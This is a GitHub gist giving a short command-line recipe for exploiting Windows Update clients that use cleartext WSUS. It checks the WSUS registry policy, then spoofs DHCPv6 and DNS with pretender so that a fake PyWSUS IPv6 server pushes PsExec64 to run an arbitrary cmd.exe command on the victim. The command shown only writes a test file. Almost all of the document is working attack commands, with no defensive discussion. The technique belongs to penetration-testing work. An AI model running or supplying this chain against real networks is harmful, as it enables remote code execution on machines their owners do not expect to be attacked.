Created
October 10, 2022 12:33
-
-
Save zimnyaa/bc5e50a24f7110f2bc09f5439e9551aa to your computer and use it in GitHub Desktop.
Cleartext WSUS exploitation with DHCPv6 spoofing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # checking WSUS preferenses | |
| PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer | |
| PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer | |
| ### after setting up the attack click "Check for updates" button | |
| ### set up DHCPv6 spoofing | |
| git clone https://github.com/RedTeamPentesting/pretender.git | |
| cd pretender | |
| sudo ./pretender -i eth0 --spoof wsus.lab.local | |
| ### setting up the IPv6 PyWSUS fork | |
| git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git | |
| cd pywsus-ipv6 | |
| sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment